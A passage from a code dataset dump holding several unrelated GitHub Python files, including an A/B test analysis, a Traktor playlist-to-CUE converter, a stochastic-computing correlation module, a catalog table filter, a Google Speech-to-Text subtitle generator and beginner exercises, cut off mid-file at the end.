0.9780, p-value = 0.6163\n\n# Same as the control group, HO Can't be rejected for all the variables, which means it's normally distributed.\n\n# Now that we found that both groups are normally distributed, it's time to check the variance homogeneity\n# Alternative: If the normality assumption wasn't satisfied we can use another test: Mann-Whitney\n\n###########################################################\n\n## The Variance Homogeneity:\n\n# H0: There is no significant statistical difference between the variances of purchases of the test and control groups.\n# H1: There is a significant statistical difference between the variances of purchases of the test and control groups.\n# p < 0.05 H0 Rejected\n# p > 0.05 H0 Can't be rejected\n\nfor col in originalCols:\n test_stat, pvalue = levene(df.loc[df[\"Group\"] == \"Control\", col],\n df.loc[df[\"Group\"] == \"Test\", col])\n print(col + ' results: \\n Test Stat = %.4f, p-value = %.4f\\n' % (test_stat, pvalue))\n\n# Impression results:\n# Test Stat = 0.5865, p - value = 0.4461\n\n# Click results:\n# Test Stat = 6.3041, p - value = 0.0141\n\n# Purchase results:\n# Test Stat = 2.6393, p - value = 0.1083\n\n# Earning results:\n# Test Stat = 0.3532, p - value = 0.5540\n\n# HO Can't be rejected for all variables except Click.\n# we can say that there is NO statistically significant difference between the variance distributions of the variables\n# of the 2 groups, except for Click values There is statistically significant difference between the variance\n# distributions of the Click values of the 2 groups\n\n# Alternative: If the Variance Homogeneity assumption wasn't satisfied we could add an argument to the function\n# to work that situation. (equal_var=False )\n###########################################################\n\n## A/B Testing:\n\n## Purchases\n\ntest_stat,pvalue = ttest_ind(df.loc[df[\"Group\"] == \"Control\",\"Purchase\"],df.loc[df[\"Group\"] == \"Test\",\"Purchase\"],equal_var=True)\n\nprint(\"Test Stat = %.4f, pvalue = %.4f\" %(test_stat,pvalue)) # Test Stat = -0.9416, pvalue = 0.3493\n\n# H0 can't be rejected.\n\n######################################################\n\n## Impression\n\ntest_stat,pvalue = ttest_ind(df.loc[df[\"Group\"] == \"Control\",\"Impression\"],df.loc[df[\"Group\"] == \"Test\",\"Impression\"],equal_var=True)\n\nprint(\"Test Stat = %.4f, pvalue = %.4f\" %(test_stat,pvalue)) # Test Stat = -4.2966, pvalue = 0.0000\n\n# H0 is rejected.\n\n######################################################\n\n## Earning\n\ntest_stat,pvalue = ttest_ind(df.loc[df[\"Group\"] == \"Control\",\"Earning\"],df.loc[df[\"Group\"] == \"Test\",\"Earning\"],equal_var=True)\n\nprint(\"Test Stat = %.4f, pvalue = %.4f\" %(test_stat,pvalue)) # Test Stat = -9.2545, pvalue = 0.0000\n\n# H0 is rejected.\n\n######################################################\n\n## Click\n\ntest_stat,pvalue = mannwhitneyu(df.loc[df[\"Group\"] == \"Control\",\"Click\"],df.loc[df[\"Group\"] == \"Test\",\"Click\"])\n\nprint(\"Test Stat = %.4f, pvalue = %.4f\" %(test_stat,pvalue)) # Test Stat = 1198.0000, pvalue = 0.0001\n\n# H0 is rejected.\n\n\n##############################################################\n# Conclusions\n##############################################################\n\n# The Independent Samples t Test was chosen to make the A/B testing as both assumption were\n# satisfied in (Purchases,Impression,Earning).\n\n# The mannwhitneyu method was chosen to make the A/B testing for Click as there is statistically significant difference\n# between the variance distributions of the Click values of the 2 groups.\n\n# H0 can't be rejected, which means there is no significant difference between the new bidding system and the old one.\n\n##### Results ######\n# Purchase: Maximum bidding (Control Group) and Average bidding (Test Group) has the same average\n# Click: Maximum bidding (Control Group) and Average bidding (Test Group) doesn't have the same average (Higher)\n# Impression: Maximum bidding (Control Group) and Average bidding (Test Group) doesn't have the same average (Higher)\n# Earning: Maximum bidding (Control Group) and Average bidding (Test Group) doesn't have the same average (Higher)\n\n\n\n##############################################################\n# Two Group Ratio Comparison\n##############################################################\n\n# Check if both tests have at least 30 samples:\ndf_control.shape # 40\ndf_test.shape # 40\n\n\ndf[\"Purchase_Per_Impression\"] = df[\"Purchase\"] / df[\"Impression\"]\ndf[\"Purchase_Per_Click\"] = df[\"Purchase\"] / df[\"Click\"]\ndf[\"Earning_Per_Click\"] = df[\"Earning\"] / df[\"Click\"]\ndf[\"Earning_Per_Impression\"] = df[\"Earning\"] / df[\"Impression\"]\n\ndf.head()\n\n# Impression Click Purchase Earning Group Purchase_Per_Impression Purchase_Per_Click Earning_Per_Click Earning_Per_Impression\n# 0 82529.45927 6090.07732 665.21125 2311.27714 Control 0.00806 0.10923 0.37952 0.02801\n# 1 98050.45193 3382.86179 315.08489 1742.80686 Control 0.00321 0.09314 0.51519 0.01777\n# 2 82696.02355 4167.96575 458.08374 1797.82745 Control 0.00554 0.10991 0.43134 0.02174\n# 3 109914.40040 4910.88224 487.09077 1696.22918 Control 0.00443 0.09919 0.34540 0.01543\n# 4 108457.76263 5987.65581 441.03405 1543.72018 Control 0.00407 0.07366 0.25782 0.01423\n\ndf.groupby(\"Group\")[\"Purchase_Per_Impression\",\"Purchase_Per_Click\",\"Earning_Per_Click\",\"Earning_Per_Impression\"].mean()\n\n# Purchase_Per_Impression Purchase_Per_Click Earning_Per_Click Earning_Per_Impression\n# Group\n# Control 0.00558 0.11593 0.40835 0.01947\n# Test 0.00492 0.15657 0.66830 0.02140\n\npurchase_sum = np.array ([df_control[\"Purchase\"].sum (), df_test[\"Purchase\"].sum ()])\nclick_sum = np.array ([df_control[\"Click\"].sum (), df_test[\"Click\"].sum ()])\nimpression_sum = np.array ([df_control[\"Impression\"].sum (), df_test[\"Impression\"].sum ()])\nEarning_sum = np.array ([df_control[\"Earning\"].sum (), df_test[\"Earning\"].sum ()])\n\n#############################################################################\n\n# Now the data is ready to be compared:\n\n# Purchase_Per_Impression\nttest_z, pvalue = proportions_ztest (purchase_sum, impression_sum)\nprint('Test Stat = %.4f, p-value = %.4f' % (ttest_z, pvalue))\n# Test Stat = 12.2212, p-value = 0.0000\n\n\n# Purchase_Per_Click\nttest_z, pvalue = proportions_ztest (purchase_sum, click_sum)\nprint('Test Stat = %.4f, p-value = %.4f' % (ttest_z, pvalue))\n# Test Stat = -34.9800, p-value = 0.0000\n\n\n# Earning_Per_Click\nttest_z, pvalue = proportions_ztest (Earning_sum, click_sum)\nprint('Test Stat = %.4f, p-value = %.4f' % (ttest_z, pvalue))\n# Test Stat = -155.2202, p-value = 0.0000\n\n\n# Earning_Per_Impression\nttest_z, pvalue = proportions_ztest (Earning_sum, impression_sum)\nprint('Test Stat = %.4f, p-value = %.4f' % (ttest_z, pvalue))\n# Test Stat = -22.3725, p-value = 0.0000\n\n\n#############################################################################\n\n##### Results ######\n\n# Purchase_Per_Impression: Maximum bidding (Control Group) and Average bidding (Test Group) doesn't have the same\n# average (lower)\n\n# Purchase_Per_Click: Maximum bidding (Control Group) and Average bidding (Test Group) doesn't have the same\n# average (Higher)\n\n# Earning_Per_Click: Maximum bidding (Control Group) and Average bidding (Test Group) doesn't have the same\n# average (Higher)\n\n# Earning_Per_Impression: Maximum bidding (Control Group) and Average bidding (Test Group) doesn't have the same\n# average (Higher)\n","repo_name":"BeshOZ/AB_Testing","sub_path":"AB_Test.py","file_name":"AB_Test.py","file_ext":"py","file_size_in_byte":11426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20305893564","text":"import sys\nimport argparse\n\nfrom xml.dom import minidom\nfrom datetime import datetime, timedelta\n\nclass MyParser(argparse.ArgumentParser):\n def error(self, message):\n sys.stderr.write('error: %s\\n' % message)\n self.print_help()\n sys.exit(2)\n\nparser = MyParser(description='Convert a Traktor nml playlist to a cue file.')\nparser.add_argument('input', help='The nml file that will serve as input.')\nparser.add_argument('output', help='The cue file that will be written.')\nparser.add_argument('performer', help='Used for the PERFORMER tag in the cue file.')\nparser.add_argument('title', help='Used for the TITLE tag in the cue file.')\nparser.add_argument('audiofile', help='The name of the audio file that the cue file should refer to.')\nparser.add_argument('audiotype', help='The type of the audio file that the cue file should refer to: MP3, WAVE or ALAC.')\nparser.add_argument('offset', help='Offset to compensate for the discrepancy between t0 of the nml and t0 of the audio file.')\n\nargs = parser.parse_args()\n\ninput_file_name = args.input\noutput_file_name = args.output\n\noutput_file = open(output_file_name, \"w\")\n\nnml = minidom.parse(input_file_name)\n\ncollection_entries = nml.getElementsByTagName(\"COLLECTION\")[0].getElementsByTagName(\"ENTRY\")\n\nartists = {}\ntitles = {}\n\nfor entry in collection_entries:\n location = entry.getElementsByTagName(\"LOCATION\")[0]\n dir = location.getAttribute(\"DIR\")\n file = location.getAttribute(\"FILE\")\n key = dir + file\n \n artist = entry.getAttribute(\"ARTIST\")\n title = entry.getAttribute(\"TITLE\")\n\n artists[key] = artist\n titles[key] = title\n\nplaylist_entries = nml.getElementsByTagName(\"PLAYLIST\")[0].getElementsByTagName(\"ENTRY\")\n\nfirst_song_start_timestamp = -1\ntrack_counter = 1\n\ncue_performer_tag = f\"PERFORMER \\\"{args.performer}\\\"\"\ncue_title_tag = f\"TITLE \\\"{args.title}\\\"\"\ncue_file_tag = f\"FILE \\\"{args.audiofile}\\\" {args.audiotype}\"\n\noutput_file.write(cue_performer_tag + \"\\n\")\noutput_file.write(cue_title_tag + \"\\n\")\noutput_file.write(cue_file_tag + \"\\n\")\n\nfor entry in playlist_entries:\n pkey = entry.getElementsByTagName(\"PRIMARYKEY\")[0]\n key = pkey.getAttribute(\"KEY\")[2:]\n \n ext_data = entry.getElementsByTagName(\"EXTENDEDDATA\")[0]\n start_time = int(ext_data.getAttribute(\"STARTTIME\"))\n\n if first_song_start_timestamp == -1:\n first_song_start_timestamp = start_time\n else:\n start_time -= int(args.offset)\n\n dt = str(datetime.fromtimestamp(start_time - first_song_start_timestamp)- timedelta(hours=1))[11:]\n \n hours_in_minutes = int(dt[0:2]) * 60\n minutes = int(dt[3:5]) + hours_in_minutes\n index_time = str(minutes) + dt[5:8] + \":00\"\n \n track_tag = f\" TRACK \" + str(track_counter).zfill(2) + \" AUDIO\"\n performer_tag = f\" PERFORMER \\\"\" + artists[key] + \"\\\"\"\n title_tag = f\" TITLE \\\"\" + titles[key] + \"\\\"\"\n index_tag = f\" INDEX 01 \" + index_time\n \n output_file.write(track_tag + \"\\n\")\n output_file.write(performer_tag + \"\\n\")\n output_file.write(title_tag + \"\\n\")\n output_file.write(index_tag + \"\\n\")\n \n track_counter += 1\n","repo_name":"izzyreal/nml2cue","sub_path":"nml2cue.py","file_name":"nml2cue.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9882595490","text":"import math\nx = 0\nstatement = 2\npi = 1\n\nwhile(statement > 1):\n pi = pi*statement\n x = math.sqrt(2 + x)\n statement = 2/x\n \nprint(\"Approximation of pi: \" + str(round(pi, 3)))\n#pi = round(pi, 3)\nrad = eval(input(\"Enter the radius:\\n\"))\narea = pi*(rad**2)\nprint(\"Area: \" + str(round(area, 3)))\n\n\n'''\nApproximation of pi: 3.142\nEnter the radius:\n2.5\nArea: 19.635\n'''\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_2/smyjas002/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30261354979","text":"import numpy as np\nfrom sim.Util import clog2\nfrom sim.SNG import lfsr_sng\n\ndef scc(bsx, bsy):\n \"\"\"Compute the stochastic cross-correlation between two bitstreams according to Eq. (1)\n in [A. Alaghi and J. P. Hayes, Exploiting correlation in stochastic circuit design]\"\"\"\n if bsx.dtype == np.dtype('uint8'):\n bsx = np.unpackbits(bsx)\n\n if bsy.dtype == np.dtype('uint8'):\n bsy = np.unpackbits(bsy)\n\n px = np.mean(bsx)\n py = np.mean(bsy)\n if px in (0, 1) or py in (0, 1):\n #raise ValueError(\"SCC is undefined for bitstreams with value 0 or 1\") \n return 0\n p_uncorr = px * py\n p_actual = np.mean(np.bitwise_and(bsx, bsy))\n if p_actual > p_uncorr:\n return (p_actual - p_uncorr) / (np.minimum(px, py) - p_uncorr)\n else:\n return (p_actual - p_uncorr) / (p_uncorr - np.maximum(px + py - 1, 0))\n \ndef reco_2(bsx, bsy):\n #Re-generate positive correlation between bitstreams\n\n if bsx.dtype == np.dtype('uint8'):\n bsx = np.unpackbits(bsx)\n\n if bsy.dtype == np.dtype('uint8'):\n bsy = np.unpackbits(bsy)\n\n px = np.mean(bsx)\n py = np.mean(bsy)\n\n N = bsx.size\n w = clog2(N)\n bs_mat = lfsr_sng(np.array([px, py]), N, w, corr=True)\n return bs_mat[0, :], bs_mat[1, :]","repo_name":"OwenHoffend/sc_sim2","sub_path":"sim/SCC.py","file_name":"SCC.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18819356529","text":"import logging\nimport re\nfrom collections import namedtuple\nfrom typing import Generator, List, Optional, Tuple\n\nfrom dbcat.catalog import Catalog, CatSchema, CatSource, CatTable\n\nLOGGER = logging.getLogger(__name__)\n\nCatalogObject = namedtuple(\"CatalogObject\", [\"name\", \"id\"])\n\n\nclass NoMatchesError(Exception):\n \"\"\"Raise Exception if schema/table/column generators do not find any matches\"\"\"\n\n message = \"No columns were scanned. Ensure include/exclude patterns are correct OR no new columns have been added\"\n\n\ndef filter_objects(\n include_regex_str: Optional[List[str]],\n exclude_regex_str: Optional[List[str]],\n objects: List[CatalogObject],\n) -> List[CatalogObject]:\n if include_regex_str is not None and len(include_regex_str) > 0:\n include_regex = [re.compile(exp, re.IGNORECASE) for exp in include_regex_str]\n matched_set = set()\n for regex in include_regex:\n matched_set |= set(\n list(filter(lambda m: regex.search(m.name) is not None, objects,))\n )\n\n objects = list(matched_set)\n\n if exclude_regex_str is not None and len(exclude_regex_str) > 0:\n exclude_regex = [re.compile(exp, re.IGNORECASE) for exp in exclude_regex_str]\n for regex in exclude_regex:\n objects = list(filter(lambda m: regex.search(m.name) is None, objects))\n\n return objects\n\n\ndef table_generator(\n catalog: Catalog,\n source: CatSource,\n include_schema_regex_str: List[str] = None,\n exclude_schema_regex_str: List[str] = None,\n include_table_regex_str: List[str] = None,\n exclude_table_regex_str: List[str] = None,\n) -> Generator[Tuple[CatSchema, CatTable], None, None]:\n\n schemata = filter_objects(\n include_schema_regex_str,\n exclude_schema_regex_str,\n [\n CatalogObject(s.name, s.id)\n for s in catalog.search_schema(source_like=source.name, schema_like=\"%\")\n ],\n )\n\n for schema_object in schemata:\n schema = catalog.get_schema_by_id(schema_object.id)\n LOGGER.info(\"Generating schema %s\", schema.name)\n table_objects = filter_objects(\n include_table_regex_str,\n exclude_table_regex_str,\n [\n CatalogObject(t.name, t.id)\n for t in catalog.search_tables(\n source_like=source.name, schema_like=schema.name, table_like=\"%\"\n )\n ],\n )\n\n for table_object in table_objects:\n table = catalog.get_table_by_id(table_object.id)\n LOGGER.info(\"Generating table %s\", table.name)\n yield schema, table\n","repo_name":"tokern/dbcat","sub_path":"dbcat/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"40"} +{"seq_id":"17291229396","text":"import pandas as pd\nimport os,sys\n\ndef msgpack_assertMeta(filename, frames=None, redo=False):\n '''Asserts that the .meta file for a given .msg file exists and returns the data in the .meta file once it exists'''\n meta_out_file = filename.replace(\".msg\", \".meta\")\n print(meta_out_file)\n meta_frames = None\n if(os.path.exists(meta_out_file) and not redo):\n #Need to check for latin encodings due to weird pandas default\n try:\n meta_frames = pd.read_msgpack(meta_out_file)\n except UnicodeDecodeError as e:\n meta_frames = pd.read_msgpack(meta_out_file, encoding='latin-1')\n if(meta_frames == None):\n if(frames == None):\n print(\"Bulk reading .msg for metaData assertion. Be patient, reading in slices not supported.\")\n print(filename)\n #Need to check for latin encodings due to weird pandas default\n try:\n frames = pd.read_msgpack(filename)\n except UnicodeDecodeError as e:\n frames = pd.read_msgpack(filename, encoding='latin-1')\n meta_frames = {\"NumValues\" : frames[\"NumValues\"]}\n \n if(not os.path.exists(meta_out_file) or redo):\n pd.to_msgpack(meta_out_file, meta_frames)\n\n return meta_frames","repo_name":"DannyWeitekamp/CMS_Deep_Learning","sub_path":"CMS_Deep_Learning/storage/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"7964859671","text":"# int - conjunto dos inteiros.\n# ...-3,-2,-1,0,1,2,3...\n\nw = 1\n# int\n\n# float - números de pontos flutuantes.\n# ...-3,-3.4,-2,5,6.3...\n\nb = 1.0\n# float\n1.\n\n# complex - conjunto de números complexos.\nx = 1+2j\n# complex\n","repo_name":"Gabrielhyds/Python","sub_path":"variaveis/numeros.py","file_name":"numeros.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13121995858","text":"#inputan\nnama = input (\"Masukkan nama anda = \")\nkelas = input (\"Masukkan kelas anda = \")\nlab = input (\"Bagaimana kondisi lab sekarang = \")\n\n#proses\nprint(\"===========================\")\nif lab ==\"tersedia\":\n ket=\"Praktikum\"\nelif lab ==\"penuh\":\n ket=\"Pindah jadwal\"\nelse :\n ket=\"tidak jadi praktikum\"\n\n#output\nprint(\"===========================\")\nprint(\"Nama saya adalah = \",nama)\nprint(\"Kelas saya adalah = \",kelas)\nprint(\"Kondisi lab hari ini = \",lab)\nprint(\"Maka kamu harus = \",ket)","repo_name":"Wisnugroho14/Python","sub_path":"Tugas/lab-praktikum.py","file_name":"lab-praktikum.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9046279866","text":"import sys\n\n# 사이킷런 ≥0.20 필수\nimport sklearn\n\n# 공통 모듈 임포트\nimport numpy as np\nimport os\n\n# 노트북 실행 결과를 동일하게 유지하기 위해\nnp.random.seed(42)\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nmpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\n# 그림을 저장할 위치\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"decision_trees\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\nos.makedirs(IMAGES_PATH, exist_ok=True)\n\ndef save_fig(fig_id, tight_layout=True, fig_extension=\"png\", resolution=300):\n path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n print(\"그림 저장:\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=fig_extension, dpi=resolution)\nfrom sklearn.datasets import load_iris\nfrom sklearn.tree import DecisionTreeClassifier\n\niris = load_iris()\nX = iris.data[:, 2:] # 꽃잎 길이와 너비\ny = iris.target\n\ntree_clf = DecisionTreeClassifier(max_depth=2, random_state=42)\ntree_clf.fit(X, y)\nfrom graphviz import Source\nfrom sklearn.tree import export_graphviz\n\nexport_graphviz(\n tree_clf,\n out_file=os.path.join(IMAGES_PATH, \"iris_tree.dot\"),\n feature_names=iris.feature_names[2:],\n class_names=iris.target_names,\n rounded=True,\n filled=True\n )\n\nSource.from_file(os.path.join(IMAGES_PATH, \"iris_tree.dot\"))","repo_name":"a-mystic/Practice","sub_path":"Handson_ml/5.decision_trees.py","file_name":"5.decision_trees.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73295548601","text":"from google.cloud import speech\nfrom time import strftime\nfrom time import gmtime\nfrom google.cloud import storage\nimport wave, os, glob\nimport subprocess\n\nBUCKET_NAME = 'speech2text-artifacts'\n\n\"\"\"\n Upload Local File to Cloud Storage Bucket\n\n :param blob_name: Blob FileName\n :param path_to_file: Local path to file\n :return: File path to this resource in Cloud Storage\n\"\"\"\ndef upload_to_bucket(blob_name, path_to_file):\n print(f\"Uploading {blob_name}\")\n storage_client = storage.Client()\n\n bucket = storage_client.get_bucket(BUCKET_NAME)\n blob = bucket.blob(blob_name)\n blob.upload_from_filename(path_to_file)\n return f'gs://{BUCKET_NAME}/{blob_name}'\n\n\n\"\"\"\n Speech to Text\n\n :param gcs_uri: Audio File's Cloud Storage URL\n :param model: Speech to Text Transcription models\n :return: Speech to Text Response\n\"\"\"\ndef speech_to_text_conversion(gcs_uri, model):\n print(f\"Speech to Text Conversion Started...\")\n client = speech.SpeechClient()\n\n audio = speech.RecognitionAudio(uri=gcs_uri)\n\n config = speech.RecognitionConfig( \n language_code=\"en-US\",\n enable_automatic_punctuation=True,\n model=model,\n use_enhanced=True,\n enable_word_time_offsets=True,\n )\n\n operation = client.long_running_recognize(\n request={\"config\": config, \"audio\": audio}\n )\n\n print(\"Waiting for operation to complete...\")\n response = operation.result(timeout=1000000)\n return response\n\n\"\"\"\n Generate Subtitile and Save Locally\n\n :param speech_to_text_response: Speech to Text Response\n :param filename: Video File BaseName\n :return: void\n\"\"\"\ndef generate_subtitle(speech_to_text_response, file_basename):\n print(f\"Subtitle Generate Started...\")\n \n subtitle = ''\n sub_idx = 1\n for result in speech_to_text_response.results:\n best_alternative = result.alternatives[0]\n transcript = best_alternative.transcript\n confidence = best_alternative.confidence\n print(\"-\" * 20)\n print(f\"Transcript: {transcript}\")\n print(f\"Confidence: {confidence}%\")\n\n sentense_start_idx = 0\n sentence_start_time = 0.00\n sentence_start_time_ms = '000'\n sentence_end_time = 0.00\n sentence_end_time_ms = '000'\n sentense = ''\n for idx, word_info in enumerate(best_alternative.words):\n word = word_info.word\n start_time = word_info.start_time\n end_time = word_info.end_time\n is_end_of_sentense = word[-1] in ['.', '?']\n sentense += f\"{word} \"\n\n if sentense_start_idx == idx:\n sentence_start_time = start_time.total_seconds()\n sentence_start_time_ms = str(start_time.microseconds // 1000).zfill(3)\n\n if idx == len(best_alternative.words)-1 or is_end_of_sentense:\n sentence_end_time = end_time.total_seconds()\n sentence_end_time_ms = str(end_time.microseconds // 1000).zfill(3)\n\n # Append Subtitile Sentense\n subtitle += f\"{sub_idx}\\n\"\n subtitle += f\"{strftime('%H:%M:%S', gmtime(sentence_start_time))},{sentence_start_time_ms} --> {strftime('%H:%M:%S', gmtime(sentence_end_time))},{sentence_end_time_ms}\\n\"\n subtitle += f\"{sentense}\\n\\n\"\n\n sentense = ''\n sub_idx += 1\n sentense_start_idx = idx + 1\n\n # Write Subtitile to SRT File\n f = open(f\"{file_basename}-subtitle.srt\", \"w\")\n f.write(subtitle)\n f.close()\n\n# Main\nfor video_filename in glob.glob(os.path.join('', '*.mp4')):\n audio_file_basename = '.'.join(video_filename.split('.')[0:-1])\n audio_filename = f\"{audio_file_basename}.wav\"\n\n # Converting MP4 to WAV\n print(f\"\\nConverting {video_filename} to {audio_filename}\")\n subprocess.Popen(f\"ffmpeg -i \\\"{video_filename}\\\" -acodec pcm_s16le -ac 1 -ar 16000 -y \\\"{audio_filename}\\\"\", stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()\n \n # Upload Converted WAV File to Cloud Bucket\n gcs_uri = upload_to_bucket(audio_filename, audio_filename)\n \n # Speech to Text Conversion\n speech_to_text_response = speech_to_text_conversion(gcs_uri, \"video\")\n\n # Generate Subtitile\n generate_subtitle(speech_to_text_response, audio_file_basename)","repo_name":"BhanukaUOM/Video-Subtitle-Generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9314448657","text":"import ClassSample as clazz\nimport platform\nimport Configuraaaation as conf\ns = clazz.Student(\"sampath\", 12)\ns.print_name()\n\n\n\nx = platform.system()\nprint(x)\ny = dir(platform)\nprint(y)\n\na = conf.person\nprint(a.get(\"name\"))","repo_name":"nawgala/python-variables","sub_path":"ModuleSample.py","file_name":"ModuleSample.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39442066680","text":"from reportlab.pdfgen import canvas\nimport datetime\n\ndef pdf_gen():\n datatime = ''.join(str(datetime.datetime.now()).split(' ')).replace(':','-')\n\n c = canvas.Canvas('./%s.pdf' % datatime)\n c.drawString(100,750, 'Selected Payment Option: ')\n c.drawString(100,730, 'Sample data')\n\n # canvas.line\n # 1st digit is margin left\n # 2nd digit is vertical position of left tip\n # 3rd digit is margin right\n # 4th digit is vertical position of right tip\n c.line(1,744,747,744)\n c.save()\n\n return c\n\npdf_gen()","repo_name":"imLia/py_pdf_generator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9844432612","text":"\n# Outline for Main function\nfrom create_image import create_image\nfrom check_wifi import is_internet_available\nfrom create_metadata import create_metadata\nfrom create_combined import create_combined\nfrom upload_image import upload_image\nfrom create_digest import create_digest\nfrom create_signature import create_signature\nimport cv2\nimport base64\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef main(camera_number_string):\n#---------------------- Wait for Camera input and take picture ----------------------------\n\t\n\timage = create_image() # take the image\n\t\n\timage_blurred = cv2.blur(image,(5,5))\n\t_, encoded_image = cv2.imencode('.png', image_blurred) # we send the encoded baltered image to the cloud \n\t\n\tprint(\"Took Image; Using Sending Blurred\")\n\t\n#---------- Capture GNSS Data (Time and Location) ------------------------\n\n\t#time, location, = capture_time_location() # time and location both returned as strings\n\ttime = \"2023-10-29 14:30:00\"\n\tlocation = \"Latitude: 40.7128, Longitude: -74.0060\"\n\t#print(f\"Recieved Time and GNSS Data: {time}{location}\")\n\n#-------------- combine number + image + Time + Location ----------------------------------------------\n\n\tcombined_data = create_combined(camera_number_string, image, time, location) # returns combined data as a \n\t#print(f\"Made combined_data: {combined_data}\")\n\n# ---------------- Create digest for signing --------------------------\n\ttry:\n\t\tdigest = create_digest(combined_data)\n\t\t#print(\"Created Digest: \", digest)\n\n\texcept Exception as e:\n\t\tprint(str(e))\n\n# ---------------- Send image to TPM for Signing ------------------------\n\ttry:\n\t\tsignature_string = create_signature(digest) # byte64 encoded signature\n\t\t#print(\"Created signature_base64 string: \", signature_string)\n\t\t\n\texcept Exception as e:\n\t\tprint(str(e))\n\n#---------------- Create Metadata ------------------------------------\n\n\tmetadata = create_metadata(camera_number_string, time, location, signature_string) # creates a dictionary for the strings [string, string, string, byte64]\n\t#print(f\"Metadata: {metadata}\")\n\tprint(\"Camera Number: \", metadata['CameraNumber'])\n\n#------------------ Check if we have Wi-FI -----------------------------\n\n\tif is_internet_available():\n\t\tprint(f\"Internet is available...Uploading\")\n\n\t\tupload_image(encoded_image.tobytes(), metadata) # cv2 png object, metadat\n\t\tprint(f\"Uploaded Image\")\n\t\n\telse: \n\n\t\tprint(\"No wifi\")\n\t\t\n \n\tplt.figure(figsize=(12,6))\n\t# Display original image\n\tplt.subplot(1, 2, 1)\n\tplt.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n\tplt.title(\"Original Image\")\n\tplt.axis(\"off\")\n\n # Display blurred image\n\tplt.subplot(1, 2, 2)\n\tplt.imshow(cv2.cvtColor(image_blurred, cv2.COLOR_BGR2RGB))\n\tplt.title(\"Blurred Image\")\n\tplt.axis(\"off\")\n\t\t\n\tplt.show()\n\t# ---------------- Save the image and metadata to files -------------------\n\n#------------- Callback Functions for recieving Success or Failure messages for each image from cloud ------------\n\t# If success; Delete file from SD Card \n\t# If Failure; Reupload \n\n# --------------- Callback function for re-connecting to Wi-Fi ----------------------\n\t# check SD card and upload all photos\n\ncamera_number_string = \"1\" # camera number used to search for public key\nmain(camera_number_string)\n\n","repo_name":"JohnDale02/SDP-Camera","sub_path":"main_fake.py","file_name":"main_fake.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5662415953","text":"#!/usr/bin/env bash\n\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import cross_val_score\nfrom vector_fft_media_absoluta import load_datasets\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom sklearn import svm\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\n\ndef cross_validation(x_train, y_train, x_test, y_test,kernel):\n\tcv_scores = []\n\n\ttargets = np.concatenate((y_train, y_test))\n\tdata = np.concatenate((x_train, x_test))\n\n\tfor k in range(0,100):\n\t\tsvclassifier = svm.SVC(kernel=kernel, gamma=10, class_weight=\"balanced\", degree=3, decision_function_shape='ovo')\n\t\tscores = cross_val_score(svclassifier, data, targets, cv=10, scoring='accuracy')\n\t\tcv_scores.append(scores.mean())\n\tcv_scores = np.array(cv_scores)\n\tprint(\"<<< USED KERNEL {} >>>\".format(kernel))\n\tprint(\"The best result after 100 runs and 10-fold cross validation was {}%\".format(np.around(cv_scores.mean() * 100, decimals=4)));\n\n\ndef max_data_length(data1,data2):\n\n\tif(np.size(data1,0) >= np.size(data2,0)):\n\t\treturn np.size(data2,0)\n\telse:\n\t\treturn np.size(data1,0)\n\n#Entrenamiento y evaluación del modelo\ndef SVM(dataset):\t\n\tdata = np.delete(dataset,5,1)\n\ttargets = dataset[:,5];\t\n\n\n\tx_train, x_test, y_train, y_test = train_test_split(data, targets, test_size=0.40, random_state=42)\n\n\tfor fig_num, kernel in enumerate(('linear', 